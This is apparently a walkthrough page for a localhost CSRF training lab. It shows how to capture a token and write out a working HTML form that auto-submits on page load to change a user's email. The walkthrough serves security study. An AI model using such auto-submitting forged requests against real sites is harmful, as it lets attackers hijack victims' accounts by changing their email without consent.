CSRF 0x02

First update the email of jeremy

get the token from the post request

here paste the token part then just change it

<html>
<body>

<form action="http://localhost/labs/csrf0x02.php" method="post">
<input type="text" name="email" value="tryingcsrf@csrf.com" >
<input type="text" name="csrf" id="csrf" value="kyouwashere" hidden>
<button type="submit">Submit</button>
</form>


<script>
window.onload = function(){
	document.forms[0].submit();

}	

</script>

</body>
</html>

then visit the html

you can host this file with live target or something

file:///home/kali/bug-bounty/csrf2.html

now the email was change

PreviousCSRF 0x01 NextSSRF 0x01

Last updated 1 year ago